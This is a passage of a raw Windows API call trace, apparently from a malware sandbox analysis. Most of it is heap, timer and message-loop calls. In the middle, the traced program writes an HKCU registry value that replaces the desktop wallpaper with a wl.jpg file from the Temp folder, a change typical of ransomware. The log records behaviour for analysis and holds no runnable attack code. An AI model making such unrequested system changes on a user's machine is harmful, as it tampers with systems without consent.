wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.299] Sleep (dwMilliseconds=0xa) [0301.314] timeGetTime () returned 0x4b47e [0301.314] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.315] Sleep (dwMilliseconds=0xa) [0301.330] timeGetTime () returned 0x4b48e [0301.330] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0301.330] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0301.330] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0301.330] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0301.330] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0301.330] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.330] Sleep (dwMilliseconds=0xa) [0301.346] timeGetTime () returned 0x4b49d [0301.346] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.346] Sleep (dwMilliseconds=0xa) [0301.361] timeGetTime () returned 0x4b4ad [0301.361] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.361] Sleep (dwMilliseconds=0xa) [0301.386] timeGetTime () returned 0x4b4bd [0301.386] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.386] Sleep (dwMilliseconds=0xa) [0301.392] timeGetTime () returned 0x4b4cc [0301.392] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.392] Sleep (dwMilliseconds=0xa) [0301.408] timeGetTime () returned 0x4b4dc [0301.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0301.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0301.408] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0301.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0301.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0301.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0301.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0301.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0301.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0301.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0301.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0301.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0301.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0301.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0301.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0301.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0301.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0301.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0301.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0301.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0301.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0301.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0301.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0301.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0301.410] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0301.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0301.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0301.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0301.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0301.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0301.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0301.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0301.410] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0301.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0301.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0301.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0301.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0301.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0301.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0301.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0301.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0301.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0301.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0301.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0301.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0301.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0301.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0301.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0301.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0301.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0301.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0301.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0301.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0301.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0301.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0301.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0301.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0301.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0301.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0301.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0301.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0301.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0301.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0301.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0301.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0301.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0301.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0301.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0301.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0301.413] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0301.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0301.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0301.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0301.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0301.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0301.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0301.414] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0301.414] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0301.414] RegCloseKey (hKey=0x294) returned 0x0 [0301.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0301.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0301.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0301.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0301.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0301.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0301.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0301.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0301.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0301.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0301.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0301.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0301.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0301.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0301.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0301.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0301.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0301.415] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0301.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0301.415] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0301.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0301.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0301.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0301.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0301.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0301.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0301.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0301.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0301.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0301.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0301.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0301.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0301.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0301.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0301.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0301.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0301.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0301.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0301.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0301.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0301.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0301.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0301.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0301.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0301.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0301.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0301.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0301.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0301.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0301.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0301.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0301.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0301.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0301.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0301.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0301.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0301.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0301.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0301.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0301.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0301.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0301.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0301.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0301.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0301.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0301.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0301.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0301.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0301.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0301.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0301.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0301.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0301.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0301.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0301.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0301.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0301.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0301.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0301.419] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0301.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0301.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0301.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0301.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0301.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0301.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0301.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0301.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0301.420] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0301.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0301.420] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0301.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0301.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0301.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0301.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0301.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0301.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0301.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0301.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0301.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0301.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0301.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0301.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0301.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0301.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0301.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0301.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0301.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 